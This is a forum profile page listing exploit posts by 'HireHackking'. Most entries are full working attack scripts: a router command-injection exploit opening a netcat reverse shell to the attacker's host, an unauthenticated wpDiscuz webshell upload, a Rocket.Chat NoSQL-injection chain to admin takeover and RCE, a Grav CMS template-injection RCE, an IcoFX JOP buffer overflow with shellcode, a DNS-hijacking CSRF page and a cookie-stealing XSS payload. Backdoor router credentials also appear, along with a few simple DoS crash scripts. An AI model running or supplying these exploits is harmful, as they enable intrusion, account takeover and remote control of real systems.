Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Macaron Notes great notebook 5.5 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC) # Date: 06-04-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221 # Version: 5.5 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
  2. HireHackking

    WordPress Plugin Smart Slider-3 3.5.0.8 - 'name' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Smart Slider-3 3.5.0.8 - 'name' Stored Cross-Site Scripting (XSS) # Exploit Author: Hardik Solanki # Date: 05/06/2021 # Software Link: https://wordpress.org/plugins/smart-slider-3/ # Version: 3.5.0.8 # Tested on Windows *How to reproduce vulnerability:* 1. Install WordPress 5.7.2 2. Install and activate the "*Smart Slider 3" Version 3.5.0.8* plugin 3. Navigate to "*Dashboard* and create a "*New Project*". 4. Enter the JavaScript payload "*<script>alert(document.cookie)</script>*" into the "*Name*" field. 5. You will observe that the Project has been created with malicious JavaScript payload "<script>alert(document.cookie)</script>" and hence project has been* created/stored* and thus JavaScript payload is executing successfully. *XSS IMPACT:* 1: Steal the cookie 2: User redirection to a malicious website
  3. HireHackking

    My Notes Safe 5.3 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC) # Date: 06-04-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781 # Version: 5.3 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
  4. HireHackking

    IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP # Date: 2020-05-20 # Exploit Author: Austin Babcock # Vendor Homepage: https://icofx.ro/ # Software Link: https://drive.google.com/file/d/1SONzNStA_W3pAPU5IUvsYS3z0jYymEZn/view?usp=sharing # Version: 2.6.0.0 # Tested on: Windows 7 Ultimate x64 # CVE: CVE-2013-4988 # Steps: 1. Run script 2. Open application 3. Open maliciousJOP.ico via file -> open dropdown menu # Payload Length: 1626 bytes #While this is an older CVE, it is very rare to have a JOP chain available for a binary which is what this exploit attempts to demonstrate. #Gadgets were found using the JOP ROCKET tool which is available at https://github.com/Bw3ll/JOP_ROCKET #This exploit utilizes ROP to set up a JOP chain that will perform multiple stack pivots and call VirtualProtect(). #JOP utilizes a dispatcher gadget (#add ecx, dword ptr [eax] #jmp dword ptr [ecx]) to executes gadgets found within the dispatch table. #The ECX register will hold the address of the dispatch table, which will be modified each time the dispatcher gadget executes. #After each modification, ECX will point to the address of the next gadget in the JOP chain and "jmp dword ptr [ecx]" executes that gadget. #Each functional gadget must end in a jmp or call to a register containing the address of the dispatcher gadget. #In this exploit, ecx is used to hold the address of the dispatch table, and edi is used to hold the dispatcher gadget address. #The dispatch table is located just after the shellcode in this exploit's payload. The address is loaded into ECX using ROP to programatically generate the correct address.. #!/usr/bin/python2 import struct # Stuff we'll need for creating our malicious .ico header = "\x00\x00\x01\x00\x00\x6F" option = "\x02\x00\x00\x00" pad2 = "\x41"*8 nseh = "\xfe\xff\xff\xff" base = 0x400000 # SEH Overwrite with stack pivot - ADD ESP,0x800 # POP EBX # RET seh = struct.pack('<L', 0x0044f012) ########################### #### LOAD DISPATCH TABLE ADDR INTO ECX #### #The dispatch table's address is calculated based off of the value of EBP, which is related to the paylaod's location in memory. jopSetup = struct.pack('<I',0x00580ca8) # POP ECX # RETN <- jopSetup += struct.pack('<I',0x0000000) #clear ecx jopSetup += struct.pack('<I', base + 0x000e8643) # ADD ECX,EBP # RETN jopSetup += struct.pack('<I', base + 0x00007c03) # POP EAX # RETN jopSetup += struct.pack('<I',0x00009f0) # offset for disp table jopSetup += struct.pack('<I', base + 0x00007c63) # ADD ECX,EAX # RETN # ecx = disp table #### LOAD ADD VALUE PTR INTO EAX #### #Since the dispatcher gadget uses the instruction "add ecx, dword ptr[eax]" to modify the address of the dispatch table, #eax must point to a valid location in memory containing the value we want to add to ecx each time the dispatcher executes. #In this case, eax will point to an address containing the value 0x00000004. jopSetup += struct.pack('<I', base + 0x0029c000) # MOV EAX,ECX # POP ESI # RETN <- jopSetup += struct.pack('<I',0x0000000) # junk jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN #### LOAD WRITABLE ADDR OFFSET INTO EBX #### #The gadget used for stack pivoting has an extra instruction (or byte ptr [ebx - 0x781703bb]) that cannot be avoided. #In order to ensure this instruction does not cause problems, ebx-0x781703bb must point to a writable section of memory so #that the instruction does not cause an access violation. This section makes sure ebx contains a compatible value. jopSetup += struct.pack('<I', base + 0x00390000) # POP EBX # RETN jopSetup += struct.pack('<I', 0x78c0609a) # needed for stack pivot JOP gadget -- offset to writable addr #### LOAD DISPATCHER ADDR INTO EDI #### jopSetup += struct.pack('<I',base + 0x00051423) # POP EDI # RETN jopSetup += struct.pack('<I',base + 0x6d81) # disp gadget address #Dispatcher: #add ecx, dword ptr [eax] 0x406d81 (offset 0x6d81) #jmp dword ptr [ecx] #### BEGIN JOP -- PERFORM STACK PIVOT #### jopSetup += struct.pack('<I', base + 0x1623) # JMP EDI table = struct.pack('<I',0x44444444) # padding #PIVOT 40 BYTES #Last POP will put VP ptr in EBP for i in range(10): table += struct.pack('<I', 0x588b9b) #pop ebp # or byte ptr [ebx - 0x781703bb], cl # jmp edi <- #### CALL VirtualProtect() #### #The derferencing gadget used to call VirtualProtect() has an offset of -0x71 bytes from ebp. #To account for this, when the pointer for VirtualProtect() is loaded into ebp, 0x71 bytes are added to it in order #to ensure that ebp-0x71 is the correct value for the pointer. This can be seen below. table += struct.pack('<I',0x4c8eb7) #jmp dword ptr [ebp - 0x71] <- # VP ptr + offset for jmp ebp gadget vpPtr = struct.pack('<I',0x00bf6668 + 0x71) ############################################################################################ msg_sc = ("\x31\xD2\xB2\x30\x64\x8B\x12\x8B\x52\x0C\x8B\x52\x1C\x8B\x42\x08\x8B\x72\x20\x8B\x12\x80" "\x7E\x0C\x33\x75\xF2\x89\xC7\x03\x78\x3C\x8B\x57\x78\x01\xC2\x8B\x7A\x20\x01\xC7\x31\xED" "\x8B\x34\xAF\x01\xC6\x45\x81\x3E\x46\x61\x74\x61\x75\xF2\x81\x7E\x08\x45\x78\x69\x74\x75" "\xE9\x8B\x7A\x24\x01\xC7\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01\xC7\x8B\x7C\xAF\xFC\x01\xC7\x68" "\x50\x21\x20\x01\x68\x78\x20\x4A\x4F\x68\x49\x63\x6F\x46\x89\xE1\xFE\x49\x0B\x31\xC0\x51" "\x50\xFF\xD7") # ExitProcess(0); exit_sc = "\x31\xc0\x50\xb8\x00\x60\xbf\x00\xff\x10" addesp = "\x81\xec\x00\x10\x00\x00" # Stack pivot at start of shellcode shellcode = addesp + msg_sc + exit_sc nopwrap = "\x90"*(0x168 - len(shellcode)) + shellcode + "\x90"*0x20 # padding until VP parameter location paramPad = "C" *(36) paramPad += vpPtr ### VIRTUAL PROTECT PARAMETERS ### vpParams = struct.pack('<I',0x18f744) #return addr vpParams += struct.pack('<I',0x18f744) #lpAddr vpParams += struct.pack('<I',0x500) #dwSize vpParams += struct.pack('<I',0x40) #flNewProt vpParams += struct.pack('<I',0x00bf4d0a) #lpfOldProtect # pad1 holds JOP Setup chain, VP() Parameters, Shellcode, Value for ADD, and Dispatch Table pad1 = "A"*580 + jopSetup + paramPad + vpParams + nopwrap addVal = struct.pack('<I',0x00000004) # how much for disp gadget to add to Dispatch Table address pad1 += addVal pad1 += table # dispatch table pad1 += "B"*(0x640-len(pad1)) # Piece together our exploit payload = header + pad1 + option + pad2 + nseh + seh # Write out our malicious file writeFile = open ("maliciousJOP.ico", "wb") writeFile.write( payload ) writeFile.close()
  5. HireHackking

    Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) # Date: 06-04-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/sticky-notes-color-widgets/id1476063010 # Version: 1.4.2 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
  6. HireHackking

    OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated) # Date: 23/03/2021 # Exploit Authors: Developed by SecNigma and Amal. # Vendor Homepage: https://optilinknetwork.com/ # Version: ONT1GEW V2.1.11_X101 Build.1127.190306 # Mitigation: Ask the vendor to issue a router upgrade to Build.1653.210425 and above, # as they do not release the firmware to the public for some unknown reason. # Additional notes: # Tested on the following configuration. Might be suitable for other OptiLink devices with Build <= 1127.190306. # Device Name: ONT1GEW # Software Version: V2.1.11_X101 # Build Information: Build.1127.190306 # Chances are that XPONs of C-DATA company are affected too. # Our research indicated that Optilink devices are just a rebranded version of C-Data. # This exploit was tested on the following configuration. #!/usr/bin/python3 import requests import argparse import re def is_login_success(r): match=re.findall("invalid username!|bad password!|you have logined error 3 consecutive times, please relogin 1 minute later!|another user have logined in",r.text) if match: return match # Default configuration # Router address = 192.168.101.1 # LPORT = 9001 # Default Username = e8c / Backdoor / # Default Password = e8c / Credentials / parser= argparse.ArgumentParser() parser.add_argument("-t", "--target", dest = "target", default = "192.168.101.1", help="Target OptiLink Router IP") parser.add_argument("-l", "--lhost", dest = "lhost" , help="Our Local IP to catch the shell!", required=True) parser.add_argument("-lp", "--lport", dest = "lport", default = "9001", help="Our Local port for catching the shell!") parser.add_argument("-u", "--user", dest = "user", default = "e8c", help="Username of Optilink Router") parser.add_argument("-p", "--pass", dest = "passw", default = "e8c", help="Password of Optilink Router") args = parser.parse_args() target=args.target, lhost=args.lhost, lport=args.lport, user=args.user, passw=args.passw # e8c:e8c are the backdoor administrator creds to Optilink devices # Alternate backdoor credentials are adsl:realtek, admin:admin. user2="e8c" passw2="e8c" home_url="http://"+target[0]+"/boaform/admin/formLogin" print("[+] Trying to authenticate...") # Authenticate ourselves first data={'username':user, 'psd':passw} r=requests.post(home_url,data) res=is_login_success(r) if res: print("[-] Exploit failed when using the following credentials: "+str(user)+":"+str(passw)+"") print("[-] Exploit failed with the following error:") print(res) print("[!] Do you want to try to authenticate with the following credentials: "+str(user2)+":"+str(passw2)+" ?") val = input("Press y or n : ") if val[0].lower()=="y": print("[+] Trying to authenticate with the credentials "+str(user2)+":"+str(passw2)+"") # Authenticate ourselves with new creds data={'username':user2, 'psd':passw2} r=requests.post(home_url,data) res2=is_login_success(r) if res2: print("[-] Exploit failed when using the following credentials: "+str(user2)+":"+str(passw2)+"") print("[-] Exploit failed with the following error:") print(res2) print("[-] Halting Execution.") exit() else: print("Received input "+val+"") print("[-] Halting Execution.") exit() print("[+] Looks like authentication was succesful!") print("[+] Trying to fetch the WAN Name...") # Fetching Wan Name # wan_name="1_INTERNET_R_VID_***" get_wan_url = "http://"+target[0]+"/diag_ping.asp" r=requests.get(get_wan_url) match=re.findall("name=\"waninf\"><option value=\"(.*?)\">",r.text) wan_name=match[0] print("[+] Initiating Exploitation. Don't forget to start the nc listener on port "+str(lport)+"..") print("[+] I'm Waiting...Said Captain Jagdish *wink* *wink*") print("[+] If everything went right, you should've gotten a shell right now!") # Starting Exploitation # The same vulnerability exists in formPing and formTracert. # exploit_url = "http://"+target[0]+"/boaform/admin/formPing" exploit_url = "http://"+target[0]+"/boaform/admin/formTracert" # Found a new way to get reverse shell using mknod instead of mkfifo during the exploitation of this router :) # BusyBox binary used by this router was very limited and didn't had mkfifo. So, we got creative to workaround it. # The payload is available at swisskeyrepo's PayloadAllTheThings GitHub repo as Netcat BusyBox payload. # https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox post_data='target_addr="1.1.1.1+`rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+'+lhost[0]+'+'+lport[0]+'+>/tmp/f`"&waninf='+wan_name+'"' r=requests.post(exploit_url,post_data)
  7. HireHackking

    Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) # Author: enox # Date: 06-06-2021 # Product: Rocket.Chat # Vendor: https://rocket.chat/ # Vulnerable Version(s): Rocket.Chat 3.12.1 # CVE: CVE-2021-22911 # Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat #!/usr/bin/python import requests import string import time import hashlib import json import oathtool import argparse parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE') parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True) parser.add_argument('-a', help='Administrator email', required=True) parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True) args = parser.parse_args() adminmail = args.a lowprivmail = args.u target = args.t def forgotpassword(email,url): payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False) print("[+] Password Reset Email Sent") def resettoken(url): u = url+"/api/v1/method.callAnon/getPasswordPolicy" headers={'content-type': 'application/json'} token = "" num = list(range(0,10)) string_ints = [str(int) for int in num] characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints while len(token)!= 43: for c in characters: payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c) r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) time.sleep(0.5) if 'Meteor.Error' not in r.text: token += c print(f"Got: {token}") print(f"[+] Got token : {token}") return token def changingpassword(url,token): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "error" in r.text: exit("[-] Wrong token") print("[+] Password was changed !") def twofactor(url,email): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' headers={'content-type': 'application/json'} r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print(f"[+] Succesfully authenticated as {email}") # Getting 2fa code cookies = {'rc_uid': userid,'rc_token': token} headers={'X-User-Id': userid,'X-Auth-Token': token} payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}' r = requests.get(url+payload,cookies=cookies,headers=headers) code = r.text[46:98] print(f"Got the code for 2fa: {code}") return code def changingadminpassword(url,token,code): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "403" in r.text: exit("[-] Wrong token") print("[+] Admin password changed !") def rce(url,code,cmd): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() headers={'content-type': 'application/json'} payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}' r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print("[+] Succesfully authenticated as administrator") # Creating Integration payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}' cookies = {'rc_uid': userid,'rc_token': token} headers = {'X-User-Id': userid,'X-Auth-Token': token} r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload) data = r.text data = data.split(',') token = data[12] token = token[9:57] _id = data[18] _id = _id[7:24] # Triggering RCE u = url + '/hooks/' + _id + '/' +token r = requests.get(u) print(r.text) ############################################################ # Getting Low Priv user print(f"[+] Resetting {lowprivmail} password") ## Sending Reset Mail forgotpassword(lowprivmail,target) ## Getting reset token token = resettoken(target) ## Changing Password changingpassword(target,token) # Privilege Escalation to admin ## Getting secret for 2fa secret = twofactor(target,lowprivmail) ## Sending Reset mail print(f"[+] Resetting {adminmail} password") forgotpassword(adminmail,target) ## Getting reset token token = resettoken(target) ## Resetting Password code = oathtool.generate_otp(secret) changingadminpassword(target,token,code) ## Authenticting and triggering rce while True: cmd = input("CMD:> ") code = oathtool.generate_otp(secret) rce(target,code,cmd)
  8. HireHackking

    Nsauditor 3.2.3 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Nsauditor 3.2.3 - Denial of Service (PoC) # Date: 07/06/2021 # Author: Erick Galindo # Vendor Homepage: http://www.nsauditor.com # Software http://www.nsauditor.com/downloads/nsauditor_setup.exe # Version: 3.2.3.0 # Tested on: Windows 10 Pro x64 es # Proof of Concept: #1.- Copy printed "AAAAA..." string to clipboard! #2.- Open Nsauditor.exe #3.- Go to Register > Enter Registration Code... #4.- Write anything in 'Name' field #5.- Paste clipboard in 'Key' field #6.- Click on button -> Ok buffer = "\x41" * 256 f = open ("NBM.txt", "w") f.write(buffer) f.close()
  9. HireHackking

    Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated) # Google Dork: inurl:/wp-content/plugins/wpdiscuz/ # Date: 2021-06-06 # Original Author: Chloe Chamberland # Exploit Author: Juampa Rodríguez aka UnD3sc0n0c1d0 # Vendor Homepage: https://gvectors.com/ # Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip # Version: 7.0.4 # Tested on: Ubuntu / WordPress 5.6.2 # CVE : CVE-2020-24186 #!/bin/bash if [ -z $1 ] then echo -e "\n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]\n" exit 0 elif [ -z $2 ] then echo -e "\n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]\n" exit 0 else post=$(curl -sI http://$1$2/ | head -n1) if [[ "$post" == *"200 OK"* ]]; then wmu_nonce=$(curl -s http://$1$2/ | sed -r "s/wmuSecurity/\nwmuSecurity/g" | grep wmuSecurity | cut -d '"' -f3) webshell=$(curl -isk -X 'POST' -H 'X-Requested-With: XMLHttpRequest' -H 'Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundaryUnD3s' --data-binary $'-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0awmuUploadFiles\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmu_nonce\"\x0d\x0a\x0d\x0a'$wmu_nonce$'\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmuAttachmentsData\"\x0d\x0a\x0d\x0aundefined\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"a.php\" Content-Type: image/jpeg\x0d\x0a\x0d\x0aGIF8\x0d\x0a<?php\x0d\x0aif(isset($_REQUEST[\'cmd\'])){\x0d\x0a $cmd = ($_REQUEST[\'cmd\']);\x0d\x0a system($cmd);\x0d\x0a die;\x0d\x0a}\x0d\x0a?>\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"postId\"\x0d\x0a\x0d\x0a18\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s--\x0d\x0a' http://$1/wp-admin/admin-ajax.php | sed 's/\":"\http/\nhttp/g' | grep "http\:\\\\/" | cut -d '"' -f1 | sed 's/\\//g') echo -e "\nWebshell:" $webshell"\n" echo -e "--------------WIN--------------" echo -e " ¡Got webshell! " echo -e "-------------------------------\n" while : do read -p '$ ' command curl -s $webshell?cmd=$command | grep -v GIF8 done else echo -e "\n[!] The indicated post was not found\n" fi fi
  10. HireHackking

    Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Title: Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated) # Author: enox # Date: 06-06-2021 # Vendor: https://getgrav.org/ # Software Link: https://getgrav.org/download/core/grav-admin/1.7.10 # Vulnerable Version(s): Grav CMS 1.7.10 # CVE: CVE-2021-29440 # Credits: https://blog.sonarsource.com/grav-cms-code-execution-vulnerabilities # NOTES: You need a user who has access to /admin dashboard with page creation privileges. #!/usr/bin/python import requests from bs4 import BeautifulSoup import random import string username = 'username' password = 'password' url = 'http://grav.local' session = requests.Session() # Autheticating ## Getting login-nonce def login(url,username,password): r = session.get(url + "/admin") soup = BeautifulSoup(r.text, features="lxml") nonce = str(soup.findAll('input')[2]) nonce = nonce[47:79] ## Logging in payload =f'data%5Busername%5D={username}&data%5Bpassword%5D={password}&task=login&login-nonce={nonce}' headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = session.post(url+"/admin",data=payload,headers=headers) # Creating Page for RCE def rce(url,cmd): ## Getting form nonce and unique form id project_name = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 8)) r = session.get(url+f"/admin/pages/{project_name}/:add") soup = BeautifulSoup(r.text, features="lxml") nonce = str(soup.findAll('input')[72]) form_id = str(soup.findAll('input')[71]) form_id = form_id[54:86] nonce = nonce[46:78] ## Creating Page headers = {'Content-Type': 'application/x-www-form-urlencoded'} payload = f'task=save&data%5Bheader%5D%5Btitle%5D={project_name}&data%5Bcontent%5D=%7B%7B+system%28%27{cmd}%27%29+%7D%7D&data%5Bfolder%5D={project_name}&data%5Broute%5D=&data%5Bname%5D=default&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&toggleable_data%5Bheader%5D%5Bprocess%5D=on&data%5Bheader%5D%5Bprocess%5D%5Btwig%5D=1&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={form_id}&form-nonce={nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&data%5Bheader%5D%5Bprocess%5D%5Bmarkdown%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0' r = session.post(url+f"/admin/pages/{project_name}/:add",data=payload,headers=headers) ## Getting command output r = session.get(url+f"/{project_name.lower()}") if 'SyntaxError' in r.text: print("[-] Command error") else: a = r.text.split('<section id="body-wrapper" class="section">') b = a[1].split('</section>') print(b[0][58:]) # Cleaning up ## Getting admin-nonce r = session.get(url + "/admin/pages") soup = BeautifulSoup(r.text, features="lxml") nonce = str(soup.findAll('input')[32]) nonce = nonce[47:79] ## Deleting Page r = session.get(url+f"/admin/pages/{project_name.lower()}/task:delete/admin-nonce:{nonce}") login(url,username,password) while True: cmd = input("$ ") rce(url,cmd)
  11. HireHackking

    NBMonitor 1.6.8 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: NBMonitor 1.6.8 - Denial of Service (PoC) # Date: 07/06/2021 # Author: Erick Galindo # Vendor Homepage: http://www.nsauditor.com # Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe # Version: 1.6.8 # Tested on: Windows 10 Pro x64 es # Proof of Concept: #1.- Copy printed "AAAAA..." string to clipboard! #2.- Go to Register > Enter Registration Code... #3.- Write anything in 'Name' field #4.- Paste clipboard in 'Key' field #5.- Click on button -> Ok buffer = "\x41" * 256 f = open ("NBM.txt", "w") f.write(buffer) f.close()
  12. HireHackking

    Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF) # Date: 01/05/2021 # Exploit Author: Rodolfo Mariano # Version: Firmware 1.1.2-1.1.5 # CVE: 2021-32403 # Exploit Code: <html> <form action="http://10.0.0.1/goform/setSysTools" method="POST"> <input name="module3" value="lanCfg" type="hidden"> <input name="lanIP" value="10.0.0.1" type="hidden"> <input name="lanMask" value="255.255.255.0" type="hidden"> <input name="dhcpEn" value="true" type="hidden"> <input name="lanDhcpStartIP" value="10.0.0.100" type="hidden"> <input name="lanDhcpEndIP" value="10.0.0.200" type="hidden"> <input name="lanDns1" value="192.168.0.30" type="hidden"> <input name="lanDns2" value="" type="hidden"> </form> <script> document.forms[0].submit(); </script> </html>
  13. HireHackking

    WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
